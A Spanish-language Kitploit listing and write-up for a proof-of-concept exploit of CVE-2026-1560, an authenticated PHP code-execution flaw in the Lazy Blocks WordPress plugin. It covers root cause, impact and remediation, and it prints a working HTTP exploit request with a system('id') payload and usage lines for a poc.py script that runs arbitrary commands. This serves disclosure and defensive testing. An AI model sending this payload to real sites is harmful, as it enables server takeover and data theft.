Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — Prueba de concepto de exploit para CVE-2026-1560, una vulnerabilidad de ejecución remota de código autenticada en el plugin Lazy Blocks de WordPress, que permite a usuarios con privilegios bajos ejecutar PHP arbitrario a través de la API REST. | Kitploit
Herramientas/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

Prueba de concepto de exploit para CVE-2026-1560, una vulnerabilidad de ejecución remota de código autenticada en el plugin Lazy Blocks de WordPress, que permite a usuarios con privilegios bajos ejecutar PHP arbitrario a través de la API REST.

Ver Repositorio
2hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1560 – Ejecución Remota de Código Autenticada en Custom Block Builder – Lazy Blocks ≤ 4.2.0

Investigador: ZeYrOXxx

Plugin: Custom Block Builder – Lazy Blocks

Versiones Afectadas: ≤ 4.2.0

Severidad: Alta

CVSS: 8.8

Tipo de Vulnerabilidad: Ejecución Remota de Código Autenticada (RCE)

Vector de Ataque: API REST

Privilegio Requerido: edit_posts (Colaborador+)


Referencias

  • Aviso de Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

Resumen Ejecutivo

Se identificó una vulnerabilidad de seguridad alta en el plugin de WordPress Custom Block Builder – Lazy Blocks que afecta a las versiones hasta la 4.2.0 inclusive.
La vulnerabilidad permite a usuarios autenticados con privilegios bajos (rol de Colaborador) ejecutar código PHP arbitrario en el servidor a través de un endpoint de la API REST destinado a la funcionalidad de vista previa de bloques.

Este problema rompe por completo el modelo de privilegios de WordPress y puede conducir a un .

compromiso total del servidor

Endpoint Vulnerable

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

El endpoint es accesible para cualquier usuario autenticado con la capacidad edit_posts.


Detalles Técnicos

Verificación de Permisos

La ruta REST está registrada con una devolución de llamada de permisos débil:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

Esto incluye a los Colaboradores, a quienes nunca se les debería permitir ejecutar código PHP.


Ruta de Código Vulnerable

Controlador REST – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

Renderizador de Bloques – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

La función eval() ejecuta código PHP controlado por el atacante sin saneamiento ni validación.


Análisis de Causa Raíz

Lazy Blocks permite lógica de renderizado PHP personalizada para bloques.
El endpoint de vista previa de la API REST acepta definiciones de bloques proporcionadas por el usuario y no distingue entre bloques almacenados de confianza y bloques de vista previa controlados por el atacante.

Al inyectar atributos de bloque aplanados como:

  • code_output_method
  • code_editor_html

un atacante puede alcanzar el sumidero de ejecución php_eval() y ejecutar código PHP arbitrario.


Prueba de Concepto (HTTP)

Solicitud:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Credenciales_Colaborador]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

Respuesta:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ Ejecución de comandos arbitrarios confirmada


Esta PoC se proporciona estrictamente con fines de pruebas de seguridad e investigación.


Impacto

Un atacante con acceso de Colaborador puede:

  • Ejecutar comandos arbitrarios del sistema
  • Leer archivos sensibles (por ejemplo, wp-config.php)
  • Modificar archivos fuente PHP
  • Escalar privilegios a administrador
  • Comprometer completamente la instancia de WordPress

Remediación

  • Restringir el renderizado PHP solo a administradores
  • Eliminar el uso de eval() en entradas controladas por el usuario
  • Prevenir la vista previa REST de bloques que contengan código PHP
  • Requerir la capacidad manage_options o unfiltered_html
  • Reemplazar la ejecución de PHP con mecanismos de plantillas seguros

Uso (PoC en Python)

Requisitos

  • Python 3.x
  • Biblioteca requests
  • Credenciales válidas de WordPress con capacidad edit_posts (Colaborador+)

Instalar dependencia

root@kitploit:~
pip install requests

Ejecutar el exploit

root@kitploit:~
python3 poc.py <url_objetivo> <usuario> <contraseña> "<comando>"

Ejemplo

root@kitploit:~
python3 poc.py https://victima.sitio colaborador contraseña "id"

Si el objetivo es vulnerable, la salida del comando se devolverá en la respuesta HTTP.

⚠️ Esta prueba de concepto está destinada estrictamente a pruebas de seguridad autorizadas y fines de investigación.

Descargar herramienta